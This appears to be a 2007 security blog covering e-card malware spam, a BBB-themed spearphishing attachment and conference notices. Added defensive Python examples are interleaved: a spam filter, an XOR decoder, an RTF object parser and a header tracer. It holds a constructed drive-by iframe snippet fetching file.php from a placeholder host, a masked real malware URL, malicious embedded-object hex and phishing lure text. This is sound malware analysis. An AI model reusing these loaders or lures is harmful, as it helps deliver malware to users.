Saturday, June 30, 2007

More greeting card spam

The greeting card spam wave continues. Subject lines vary somewhat; here's a sampling from today:
  • You've received a greeting card from a class-mate!
  • You've received a greeting card from a colleague!
  • You've received a greeting card from a family member!
  • You've received a greeting card from a friend!
  • You've received a greeting card from a neighbor!
  • You've received a greeting card from a school mate!
  • You've received a greeting ecard from a class-mate!
  • You've received a greeting ecard from a colleague!
  • You've received a greeting ecard from a family member!
  • You've received a greeting ecard from a friend!
  • You've received a greeting ecard from a neighbour!
  • You've received a greeting ecard from a partner!
  • You've received a greeting ecard from a worshipper!
  • You've received a greeting postcard from a colleague!
  • You've received a greeting postcard from a family member!
  • You've received a greeting postcard from a friend!
  • You've received a postcard from a class-mate!
  • You've received a postcard from a colleague!
  • You've received a postcard from a family member!
  • You've received a postcard from a partner!
  • You've received an ecard from a partner!
  • You've received an ecard from a worshipper!
The links now point to bare IP addresses rather than the .hk domains used in the early stages.
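As an added example that is not part of the original post, one regular expression covering the whole subject-line family above, so a mail filter catches new relative/card-type combinations instead of needing one fixed string per variant. The listed subjects are copied from this post; the benign subjects used as negative controls are constructed.

```python
import re

# One pattern for the family: optional "greeting", card/ecard/postcard,
# and any relative noun (with spaces or hyphens, e.g. "family member",
# "class-mate") before the closing "!".
ECARD_SUBJECT = re.compile(
    r"^You've received an? (?:greeting )?(?:e?card|postcard) from an? [\w -]+!$",
    re.IGNORECASE,
)

# Subject lines copied from the post's sampling.
SEEN_SUBJECTS = [
    "You've received a greeting card from a class-mate!",
    "You've received a greeting ecard from a worshipper!",
    "You've received a greeting postcard from a family member!",
    "You've received a postcard from a partner!",
    "You've received an ecard from a neighbour!",
]

# Constructed negative controls that must not be flagged.
BENIGN_SUBJECTS = [
    "You've received a payment from a customer",
    "Greeting card order confirmation",
    "Re: lunch on Thursday",
]


def is_ecard_lure(subject: str) -> bool:
    """True if the subject line belongs to the e-card lure family."""
    return ECARD_SUBJECT.match(subject.strip()) is not None


if __name__ == "__main__":
    for s in SEEN_SUBJECTS + BENIGN_SUBJECTS:
        print(is_ecard_lure(s), s)
```

Anchoring on the whole sentence keeps the rule tight; the noun class is left open deliberately, since that is the part the spammers vary most.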

The Internet Storm Center has an excellent analysis.

Here's a sample 'index.html' file:


The hex code goes on for a while:


The file is obfuscated as a long run of \xNN hex escapes, each byte XORed with a one-byte key. The key in this case is 227 (0xE3); it changes from copy to copy, a simple form of polymorphism. This perl one-liner decodes the XORed hex:

perl -e 'while(<>){
s/\\x([a-f0-9]{2})/chr(227)^pack("C",hex($1))/egi;print;}' index.html


If you are analyzing your own sample, change the 227 in the perl snippet to match the key used in that copy's index.html.
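The same decoding in Python, as an added example that is not from the original post. Because the key changes per copy, it also recovers the key automatically: it tries all 256 values and ranks the output by how much of it looks like the JavaScript the post describes, not by printability alone (many small keys leave ASCII printable, so that test alone picks wrong keys). The index.html itself is not reproduced on the page, so the obfuscated input here is constructed: a drive-by style snippet encoded with the post's key 227, using the documentation address 203.0.113.5 in place of the real download host.

```python
import re
import string

# \xNN escapes as they appear in the obfuscated index.html (either hex case).
HEX_ESCAPE = re.compile(r"\\x([0-9a-fA-F]{2})")


def xor_hex_decode(text: str, key: int) -> str:
    """Same transform as the post's perl one-liner: every \\xNN escape becomes
    the byte NN XOR key; text outside the escapes passes through unchanged."""
    return HEX_ESCAPE.sub(lambda m: chr(int(m.group(1), 16) ^ key), text)


def xor_hex_encode(plain: str, key: int) -> str:
    """Inverse of xor_hex_decode; used here only to build the constructed sample."""
    return "".join("\\x%02x" % (ord(c) ^ key) for c in plain)


# Strings the real (decoded) script is expected to contain.
MARKERS = ("<script", "document", "iframe", "eval(", "http")
PRINTABLE = set(string.printable)


def recover_key(text: str, markers=MARKERS):
    """Try every one-byte key; return (key, decoded) for the best candidate.
    Rank by marker hits first, printable share second: printability alone is
    not decisive because small keys map most ASCII to other printable ASCII."""
    best = None
    for key in range(256):
        decoded = xor_hex_decode(text, key)
        hits = sum(decoded.count(m) for m in markers)
        printable = sum(c in PRINTABLE for c in decoded) / max(len(decoded), 1)
        rank = (hits, printable)
        if best is None or rank > best[0]:
            best = (rank, key, decoded)
    return best[1], best[2]


# Constructed sample: a drive-by style snippet obfuscated with the post's key
# 227. 203.0.113.5 is a documentation address, not the real download host.
SAMPLE_PLAINTEXT = (
    '<script>document.write("<iframe src=http://203.0.113.5/file.php '
    'width=0 height=0></iframe>")</script>'
)
SAMPLE_OBFUSCATED = xor_hex_encode(SAMPLE_PLAINTEXT, 227)


if __name__ == "__main__":
    key, decoded = recover_key(SAMPLE_OBFUSCATED)
    print("recovered key:", key)
    print(decoded)
```

If a sample wraps the escapes in an eval() or document.write() of its own, that wrapper text scores equally under every key and does not disturb the ranking.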

The de-obfuscated code looks like this:


Among other nastiness, it retrieves http://XX.252.250.104/file.php, which despite the .php name is a Windows executable; BitDefender identifies it as "Generic.Malware.dld!!.2526793B".

Tuesday, June 26, 2007

HK greeting card malware

Beginning this morning we received a torrent of 'greeting card' malware, linking to domains in Hong Kong.

The excellent Chinese Internet Security Response Team has a blog entry on this attack.

Sites today include 'menot', 'notme', and 'catcher', all in the .hk TLD.

The attack appears to be highly widespread. Avira detects EXP/iFrame.D.1 in the drive-by JavaScript included in the site's 'index.html' file, and TR/Small.DBY.DH in ecard.exe, which is helpfully offered if the drive-by exploit fails, with the text "We are currently testing a new browser feature. If you are not able to view this ecard, please click here to view in its original format."

The spams look like this:

---------------------------------------------------------------------
From: "*****.hk"
To:
Subject: You've received a postcard from a family member!
Date: Tue, 26 Jun 2007 19:19:33 -0500

Good day.

Your family member has sent you an ecard from ******.hk.

Send free ecards from ******.hk with your choice of colors, words and music.

Your ecard will be available with us for the next 30 days. If you wish to keep the ecard longer, you may save it on your computer or take a print.

To view your ecard, choose from any of the following options:

--------
OPTION 1
--------

Click on the following Internet address or
copy & paste it into your browser's address box.

http://******.hk/?XXXXXXXXXXXXXXXXXXXXXXX

--------
OPTION 2
--------

Copy & paste the ecard number in the "View Your Card" box at
http://*******.hk/

Your ecard number is
XXXXXXXXXXXXXXXXXXXXXXXXXXXXXX

Best wishes,
Postmaster,
*****.hk

*If you would like to send someone an ecard, you can do so at
http://*********.hk/

Thursday, June 21, 2007

'BBB.org' spearphishing attack

I've seen a number of fake 'BBB.org' emails, spammed to senior positions.

The Better Business Bureau's official site describes the attack.

I attached a cleaned-up copy below, with headers.

The emails contain an attachment, in these cases called 'Document_for_Case.doc'. It's an RTF (Rich Text Format) document that contains a malicious embedded object; here's the beginning of that file:

{\rtf1\ansi\ansicpg1252\deff0\deflang1033{\fonttbl{\f0\fswiss\fcharset0 Arial;}}
{\*\generator Msftedit 5.41.15.1507;}\viewkind4\uc1\pard\f0\fs20 This document contains an embedded object. To open it double-click the icon.\par
\par
{\object\objemb{\*\objclass Package}\objw2325\objh765{\*\objdata
01050000
02000000
08000000
5061636b61676500
00000000
00000000
882e0000
0200446f63756d656e74735f666f725f436173652e70646600433a5c41444f4245527e312e4558
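An added example, not from the original post, that parses the \objdata stream shown above: first the OLE 1.0 object header (version, format, class name), then, for a Package class object, the Packager native data. The Packager layout used here (u16 0x0002, display label, original path, two u32 fields, temp path, payload length, payload) is taken from public parsers such as oletools and is an assumption of this example, not something the post documents. Run on the post's hex it reports the class name 'Package', a native data size of 0x2E88 bytes, a display label of 'Documents_for_Case.pdf' and an original path beginning 'C:\ADOBER~1.EX' that is cut off where the post's excerpt ends. Because the excerpt stops there, the payload check (a document-style label on a payload starting with the 'MZ' executable magic) is demonstrated on a constructed, complete object produced by the companion builder function.

```python
import re
import struct

# Hex from the post's \objdata stream, as far as the post shows it (it is cut
# off in the middle of the original-path string).
POST_OBJDATA_HEX = """
01050000
02000000
08000000
5061636b61676500
00000000
00000000
882e0000
0200446f63756d656e74735f666f725f436173652e70646600433a5c41444f4245527e312e4558
"""


def objdata_to_bytes(hex_text: str) -> bytes:
    """RTF writers wrap the hex across lines; keep only the hex digits."""
    return bytes.fromhex(re.sub(r"[^0-9a-fA-F]", "", hex_text))


def _lp_string(buf, off):
    """OLE 1.0 LengthPrefixedAnsiString: u32 length, then the bytes incl. NUL."""
    (n,) = struct.unpack_from("<I", buf, off)
    return buf[off + 4:off + 4 + n].rstrip(b"\0").decode("latin-1"), off + 4 + n


def _cstring(buf, off):
    """NUL-terminated string -> (text, next offset, terminator found?)."""
    end = buf.find(b"\0", off)
    if end < 0:
        return buf[off:].decode("latin-1"), len(buf), False
    return buf[off:end].decode("latin-1"), end + 1, True


def parse_package(native: bytes) -> dict:
    """Packager native data (layout assumed from public parsers such as
    oletools): u16 0x0002, label, original path, two u32 fields (commonly
    0 and 3), u32 temp-path length, temp path, u32 payload length, payload."""
    pkg = {}
    (pkg["marker"],) = struct.unpack_from("<H", native, 0)
    pkg["label"], off, _ = _cstring(native, 2)
    pkg["orig_path"], off, complete = _cstring(native, off)
    pkg["orig_path_complete"] = complete
    if not complete or off + 12 > len(native):
        return pkg                      # stream cut off: report what we have
    _flags, _kind, temp_len = struct.unpack_from("<III", native, off)
    off += 12
    pkg["temp_path"] = native[off:off + temp_len].rstrip(b"\0").decode("latin-1")
    off += temp_len
    (size,) = struct.unpack_from("<I", native, off)
    pkg["payload"] = native[off + 4:off + 4 + size]
    return pkg


def parse_objdata(hex_text: str) -> dict:
    """OLE 1.0 ObjectHeader (MS-OLEDS), then the embedded object's native data."""
    data = objdata_to_bytes(hex_text)
    info = {}
    info["ole_version"], info["format_id"] = struct.unpack_from("<II", data, 0)
    info["class_name"], off = _lp_string(data, 8)
    info["topic_name"], off = _lp_string(data, off)
    info["item_name"], off = _lp_string(data, off)
    if info["format_id"] != 2:          # 2 = embedded object, 1 = linked object
        return info
    (info["native_size"],) = struct.unpack_from("<I", data, off)
    native = data[off + 4:off + 4 + info["native_size"]]
    info["truncated"] = len(native) < info["native_size"]
    if info["class_name"] == "Package":
        info["package"] = parse_package(native)
    return info


def build_package_objdata(label, orig_path, temp_path, payload: bytes) -> str:
    """Inverse of parse_objdata; builds a complete, constructed sample object."""
    def lp(s: bytes) -> bytes:
        return struct.pack("<I", len(s) + 1) + s + b"\0"
    native = (struct.pack("<H", 2) + label.encode() + b"\0" + orig_path.encode() + b"\0"
              + struct.pack("<III", 0, 3, len(temp_path) + 1) + temp_path.encode() + b"\0"
              + struct.pack("<I", len(payload)) + payload)
    header = struct.pack("<II", 0x501, 2) + lp(b"Package") + struct.pack("<II", 0, 0)
    return (header + struct.pack("<I", len(native)) + native).hex()


def label_hides_executable(pkg: dict) -> bool:
    """Document-style label on a payload that carries the DOS/PE 'MZ' magic."""
    return (pkg["label"].lower().endswith((".pdf", ".doc", ".txt", ".rtf"))
            and pkg.get("payload", b"").startswith(b"MZ"))


if __name__ == "__main__":
    for key, value in parse_objdata(POST_OBJDATA_HEX).items():
        print(key, value)
```

Note what the post's own bytes already tell you without the payload: the attachment is named 'Document_for_Case.doc', the object inside it labels itself 'Documents_for_Case.pdf', and the recorded original path starts with something other than a PDF. Any of those mismatches is reason enough to detonate the attachment in a sandbox rather than trust the antivirus verdict.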


That document scans 'clean' with most virus scanners: on 6/21/2007 VirusTotal reported that only 9 of its 30 engines detected it.


This attack may be fairly damaging, given the weak antivirus coverage, the fact that it arrives as a '.doc' attachment (typically allowed through Internet mail relays, unlike .exe files, which are sometimes blocked), and the fact that it targets a small number of senior users.

Here's the email, somewhat cleaned up. The original was in html format:

Received: from smtp.tele.fi (smtp.tele.fi [192.89.123.25])
by *****.*****.org (Postfix) with ESMTP id 0AAC85F13D4
for <*****@*****.org>; Thu, 21 Jun 2007 09:05:37 -0400 (EDT)
Received: from mailgw.benefon.fi (unknown [194.197.24.10])
by smtp.tele.fi (Postfix) with ESMTP id 38E97AE182
for <*****@****.org>; Thu, 21 Jun 2007 16:05:03 +0300 (EEST)
Received: from localhost.localdomain ([192.83.5.2])
by mailgw.benefon.fi (Lotus Domino Release 5.0.9)
with SMTP id 2007062116045807:59067 ;
Thu, 21 Jun 2007 16:04:58 +0300
From: Better Business Bureaus
Subject: Complaint Case Number 450596111
MIME-Version: 1.0
Date: Thu, 21 Jun 2007 16:04:58 +0300
Message-ID:
Content-Type: multipart/mixed; boundary=38ACD4BC0E5E9B20090A53C405940998
To: undisclosed-recipients:;

Dear Mr./Mrs. ***** *****

You have received a complaint in regards to your business services. The
complaint was filled by Mr. ***** ***** on 6/19/2007

Complaint Case Number: XXXXXXXXXX

Complaint Made by Consumer Mr. ***** *****

Complaint Registered Against: Company ********************

Date: 6/19/2007

Instructions on how to resolve this complaint as well as a copy of the original complaint are attached to this email.

Disputes involving consumer products and/or services may be arbitrated.
Unless they directly relate to the contract that is the basis of this dispute
the following claims will be considered for arbitration only if all parties
agree in writing that the arbitrator may consider them:

- Claims based on product liability;
- Claims for personal injuries;
- Claims that have been resolved by a previous court action, arbitration, or written agreement between the parties.

The decision as to whether your dispute or any part of it can be arbitrated rests solely with the BBB.

The BBB offers its members a binding arbitration service for disputes involving marketplace transactions.

Arbitration is a convenient, civilized way to settle disputes quickly and fairly, without the costs associated with other legal options.

© 2003 Council of Better Business Bureaus, Inc. All Rights Reserved.
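An added example, not from the original post, that walks the Received chain in the headers above to find where the message entered the mail system. The sample is the post's own header block, redactions included. Because the post's cleanup stripped the leading whitespace from continuation lines, a standard RFC 5322 unfolder would break on this copy; the unfolder here treats any line not shaped like 'Name:' as a continuation instead of relying on indentation.

```python
import re

# Header block as reproduced in the post (redactions kept, whitespace lost).
POST_HEADERS = """\
Received: from smtp.tele.fi (smtp.tele.fi [192.89.123.25])
by *****.*****.org (Postfix) with ESMTP id 0AAC85F13D4
for <*****@*****.org>; Thu, 21 Jun 2007 09:05:37 -0400 (EDT)
Received: from mailgw.benefon.fi (unknown [194.197.24.10])
by smtp.tele.fi (Postfix) with ESMTP id 38E97AE182
for <*****@****.org>; Thu, 21 Jun 2007 16:05:03 +0300 (EEST)
Received: from localhost.localdomain ([192.83.5.2])
by mailgw.benefon.fi (Lotus Domino Release 5.0.9)
with SMTP id 2007062116045807:59067 ;
Thu, 21 Jun 2007 16:04:58 +0300
From: Better Business Bureaus
Subject: Complaint Case Number 450596111
Date: Thu, 21 Jun 2007 16:04:58 +0300
To: undisclosed-recipients:;
"""

HEADER_START = re.compile(r"^[A-Za-z][A-Za-z0-9-]*:")
RECEIVED = re.compile(
    r"from\s+(?P<helo>\S+)\s*\((?P<paren>[^)]*)\)\s+by\s+(?P<by>\S+)", re.IGNORECASE)
IPV4 = re.compile(r"\[(\d{1,3}(?:\.\d{1,3}){3})\]")


def unfold(headers: str):
    """Join continuation lines onto their header. A line that does not look
    like 'Name:' is a continuation, indented or not (this copy lost its indent)."""
    fields = []
    for line in headers.splitlines():
        if HEADER_START.match(line) or not fields:
            fields.append(line.rstrip())
        else:
            fields[-1] += " " + line.strip()
    return fields


def received_hops(headers: str):
    """Received headers oldest first (the bottom-most header is the first hop).
    Per hop: HELO name claimed by the sender, reverse DNS and IP as recorded by
    the receiver, the receiving host, and the timestamp after the last ';'."""
    hops = []
    for field in unfold(headers):
        if not field.lower().startswith("received:"):
            continue
        m = RECEIVED.search(field)
        if not m:
            continue
        ip = IPV4.search(m.group("paren"))
        hops.append({
            "helo": m.group("helo"),
            "rdns": m.group("paren").split("[", 1)[0].strip() or None,
            "ip": ip.group(1) if ip else None,
            "by": m.group("by"),
            "date": field.rsplit(";", 1)[-1].strip(),
        })
    hops.reverse()
    return hops


def origin(hops):
    """The injection point is the 'from' side of the oldest hop. Only the IP,
    written by the receiving server, is evidence; the HELO name is whatever the
    client chose to announce, and hops below the first server you trust can be
    forged outright."""
    return hops[0] if hops else None


def oddities(hops):
    """Cheap tells worth a second look: a HELO of localhost, and a relay whose
    reverse DNS the next server could not resolve ('unknown')."""
    notes = []
    for h in hops:
        if h["helo"].startswith("localhost"):
            notes.append(f"{h['ip']} announced itself as {h['helo']} to {h['by']}")
        if h["rdns"] == "unknown":
            notes.append(f"{h['by']} could not resolve {h['ip']} ({h['helo']})")
    return notes


if __name__ == "__main__":
    hops = received_hops(POST_HEADERS)
    for h in hops:
        print(h)
    print("origin:", origin(hops))
    print("\n".join(oddities(hops)))
```

On this sample the oldest hop is the one mailgw.benefon.fi recorded: a client at 192.83.5.2 that introduced itself as localhost.localdomain. That line is only as good as the Domino server that wrote it, and everything earlier than the first relay you control is the sender's word, which is why the timestamps and the 'unknown' reverse lookup at the next hop are worth noting but not worth building a case on alone.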

Tuesday, June 05, 2007

Upcoming conferences and SANS Monterey

I will teach SANS Management 414: SANS® +S™ Training Program for the CISSP® Certification Exam in St. Louis, beginning this Monday:

http://www.sans.org/stlouis07_cs/


Community SANS Portland Maine 2007 was just announced, beginning August 20th. It's Hacker Techniques (Security 504), in 'bootcamp' style. It's SANS' first conference in Maine.

http://www.sans.org/portland07_cs/

I just got back from beautiful Monterey, CA, where I taught Security Hacker Techniques (SEC 504):

http://www.sans.org/monterey07/event.php

I've been to other parts of California; Monterey is my favorite so far.